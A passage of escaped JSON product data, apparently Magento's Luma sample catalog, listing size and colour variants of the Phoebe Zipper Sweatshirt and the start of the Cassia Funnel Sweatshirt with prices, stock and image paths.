ull,\"thumbnail\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"1077\":{\"sku\":\"WH07-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-L-Gray\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"1078\":{\"sku\":\"WH07-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-L-Purple\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1079\":{\"sku\":\"WH07-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-L-White\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"1080\":{\"sku\":\"WH07-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-XL-Gray\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"1081\":{\"sku\":\"WH07-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-XL-Purple\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1082\":{\"sku\":\"WH07-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt-XL-White\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"phoebe-zipper-sweatshirt-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"1083\":{\"sku\":\"WH07\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Phoebe Zipper Sweatshirt\",\"description\":\"<p>A sophisticated layer of warmth awaits you in our full-zip sweatshirt jacket. You\'ll reach for this one in any season to enjoy its sturdy exterior and plush interior.<\\/p>\\n<p>&bull; Gray full zip hoodie with yellow detail.<br \\/>&bull; Hand-warmer pockets. <br \\/>&bull; Zip MP3 pocket with outlet for earphones wire. <br \\/>&bull; Polyester\\/cotton. <br \\/>&bull; Washable.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"59\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Hoodie|Sweatshirt|Full zip,material=Cotton|Polyester,pattern=Solid,climate=Cool|Indoor|Mild,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH07-XS-Gray,size=XS,color=Gray|sku=WH07-XS-Purple,size=XS,color=Purple|sku=WH07-XS-White,size=XS,color=White|sku=WH07-S-Gray,size=S,color=Gray|sku=WH07-S-Purple,size=S,color=Purple|sku=WH07-S-White,size=S,color=White|sku=WH07-M-Gray,size=M,color=Gray|sku=WH07-M-Purple,size=M,color=Purple|sku=WH07-M-White,size=M,color=White|sku=WH07-L-Gray,size=L,color=Gray|sku=WH07-L-Purple,size=L,color=Purple|sku=WH07-L-White,size=L,color=White|sku=WH07-XL-Gray,size=XL,color=Gray|sku=WH07-XL-Purple,size=XL,color=Purple|sku=WH07-XL-White,size=XL,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh07-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh07-gray_alt1.jpg,\\/w\\/h\\/wh07-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Hoodie|Sweatshirt|Full zip\",\"material\":\"Cotton|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Cool|Indoor|Mild\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"Yes\",\"sale\":\"No\"},\"1084\":{\"sku\":\"WH08-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-XS-Orange\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1085\":{\"sku\":\"WH08-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default 